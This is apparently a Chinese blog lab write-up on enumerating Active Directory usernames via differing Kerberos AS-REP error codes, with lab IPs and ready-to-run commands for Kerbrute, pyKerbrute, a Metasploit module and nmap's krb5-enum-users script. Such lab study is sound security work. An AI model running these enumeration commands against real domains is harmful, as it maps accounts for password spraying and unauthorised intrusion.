域内用户名枚举 实验

1. 实验网络拓扑

复制代码
kali: 
192.168.72.128

win2008:
192.168.135.129
192.168.72.139

win7:
192.168.72.149

win2012:(DC)
192.168.72.131	

2. 简单原理

详细的报文分析在之前写过了,这里简单提一提。


利用的是Kerberos的AS阶段,AS_REP的回显不同,可以判断用户是否存在。

存在但pre_auth错误:KDC_ERR_PREAUTH_REQUIRED

不存在:KDC_ERR_C_PRINCIPAL_UNKNOWN

3. 实操

0x1. Kerbrute

用go写的一个可用于用户名枚举和密码喷洒的工具。

复制代码
https://github.com/ropnop/kerbrute/releases/tag/v1.0.3

xx.exe userenum --dc 192.168.72.131 -d intranet.com users.txt

其中users.txt是待爆破的用户名字典。

0x2. pyKerbrute

与Kerbrute类似,只是用python写的。

复制代码
https://github.com/3gstudent/pyKerbrute

python2 EnumADUser.py 192.168.72.131 intranet.com users.txt udp

0x3. MSF

MSF的 auxiliary/gather/kerberos_enumusers模块

0x4. Nmap

Nmap NSE脚本:krb5-enum-users

复制代码
sudo nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm="intranet.com",userdb="./users.txt" 192.168.72.131
相关推荐
路来了1 小时前
Python小工具之PDF合并
开发语言·windows·python
csdn_aspnet3 小时前
在 Windows 上安装和运行 Apache Kafka
windows·kafka
江山如画,佳人北望5 小时前
C#程序入门
开发语言·windows·c#
AustinCyy5 小时前
【环境配置】Neo4j Community Windows 安装教程
windows·neo4j
奇怪的杰哥6 小时前
Win11 加快软件开机自启动
windows
cpsvps6 小时前
Windows内核并发优化
windows
qq_3938282211 小时前
电脑休眠设置
windows·电脑·软件需求
网安小白的进阶之路14 小时前
A模块 系统与网络安全 第三门课 网络通信原理-3
网络·windows·安全·web安全·系统安全
芳草萋萋鹦鹉洲哦21 小时前
【vue3+tauri+rust】如何实现下载文件mac+windows
windows·macos·rust
李洋-蛟龙腾飞公司21 小时前
HarmonyOS NEXT应用元服务常见列表操作多类型列表项场景
windows